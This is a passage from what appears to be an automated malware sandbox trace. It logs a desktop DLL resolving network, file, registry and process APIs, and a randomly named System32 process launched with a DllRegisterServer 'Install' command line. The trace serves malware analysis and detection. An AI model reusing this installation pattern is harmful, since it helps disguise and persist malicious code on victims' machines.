(lpLibFileName="msvcrt.dll") returned 0x77720000 [0032.994] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0032.994] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0032.994] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0032.994] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0032.995] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0032.995] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0032.995] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0032.995] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0032.995] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0032.995] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0032.995] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0032.995] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0032.995] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0032.995] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0032.995] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0032.995] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0032.995] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0032.995] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0032.995] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0032.995] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0032.995] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0032.995] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0032.996] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0032.996] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0032.996] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0032.996] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0032.996] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0032.996] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0032.996] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0032.996] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0032.996] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0032.996] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0032.996] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0032.996] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0032.996] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0032.996] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0032.996] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0032.997] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0032.997] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0032.997] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0032.997] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0032.997] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0032.997] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0032.997] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0032.997] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0032.997] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0032.997] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0032.997] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0032.997] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0032.997] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0032.997] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0032.997] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0032.997] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0032.997] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0032.998] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0032.998] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0032.998] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0032.998] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0032.998] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.998] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.998] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.998] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0033.000] HeapDestroy (hHeap=0x340000) returned 1 Process: id = "30" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fa20" os_pid = "0xbb8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllRegisterServer /fn_args=\"Install\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1393 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1394 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1395 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1396 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1397 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 1398 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1399 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1400 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1401 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1402 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1403 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1404 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1405 start_va = 0xf0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1406 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 1407 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1408 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1409 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1410 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1411 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1412 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1413 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1414 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1415 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1416 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1417 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1418 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1419 start_va = 0x330000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1420 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1421 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1422 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1423 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1424 start_va = 0x400000 end_va = 0x500fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1425 start_va = 0x510000 end_va = 0x110ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1426 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1427 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 1428 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1429 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1430 start_va = 0x1200000 end_va = 0x12effff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 1431 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1432 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1433 start_va = 0x12f0000 end_va = 0x150ffff entry_point = 0x0 region_type = private name = "private_0x00000000012f0000" filename = "" Thread: id = 66 os_tid = 0xbbc [0033.036] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22f7e4 | out: lpSystemTimeAsFileTime=0x22f7e4*(dwLowDateTime=0xe1694cd0, dwHighDateTime=0x1d3dfba)) [0033.036] GetCurrentProcessId () returned 0xbb8 [0033.036] GetCurrentThreadId () returned 0xbbc [0033.036] GetTickCount () returned 0x17695 [0033.036] QueryPerformanceCounter (in: lpPerformanceCount=0x22f7dc | out: lpPerformanceCount=0x22f7dc*=365917962) returned 1 [0033.037] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.037] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0033.037] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0033.037] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0033.037] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0033.037] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.037] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.037] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.037] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.037] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.037] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.037] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.037] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.038] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.038] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.038] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.038] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.038] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.038] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.038] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.038] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.038] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.038] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.039] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.039] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.039] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.039] GetCurrentThreadId () returned 0xbbc [0033.039] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllRegisterServer /fn_args=\"Install\"" [0033.039] GetEnvironmentStringsW () returned 0x247908* [0033.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0033.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x12e09f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0033.039] FreeEnvironmentStringsW (penv=0x247908) returned 1 [0033.039] GetStartupInfoA (in: lpStartupInfo=0x22f734 | out: lpStartupInfo=0x22f734*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0033.039] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0033.039] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0033.039] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0033.039] SetHandleCount (uNumber=0x20) returned 0x20 [0033.039] GetLastError () returned 0x0 [0033.039] SetLastError (dwErrCode=0x0) [0033.039] GetLastError () returned 0x0 [0033.039] SetLastError (dwErrCode=0x0) [0033.040] GetLastError () returned 0x0 [0033.040] SetLastError (dwErrCode=0x0) [0033.040] GetACP () returned 0x4e4 [0033.040] GetLastError () returned 0x0 [0033.040] SetLastError (dwErrCode=0x0) [0033.040] IsValidCodePage (CodePage=0x4e4) returned 1 [0033.040] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x22f714 | out: lpCPInfo=0x22f714) returned 1 [0033.040] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x22f1e0 | out: lpCPInfo=0x22f1e0) returned 1 [0033.040] GetLastError () returned 0x0 [0033.040] SetLastError (dwErrCode=0x0) [0033.040] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x22f170 | out: lpCharType=0x22f170) returned 1 [0033.040] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f5f4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.040] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f5f4, cbMultiByte=256, lpWideCharStr=0x22ef58, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0033.040] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x22f1f4 | out: lpCharType=0x22f1f4) returned 1 [0033.040] GetLastError () returned 0x0 [0033.040] SetLastError (dwErrCode=0x0) [0033.040] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0033.040] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f5f4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.040] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f5f4, cbMultiByte=256, lpWideCharStr=0x22ef28, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā") returned 256 [0033.040] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0033.040] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā", cchSrc=256, lpDestStr=0x22ed18, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0033.040] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x22f4f4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 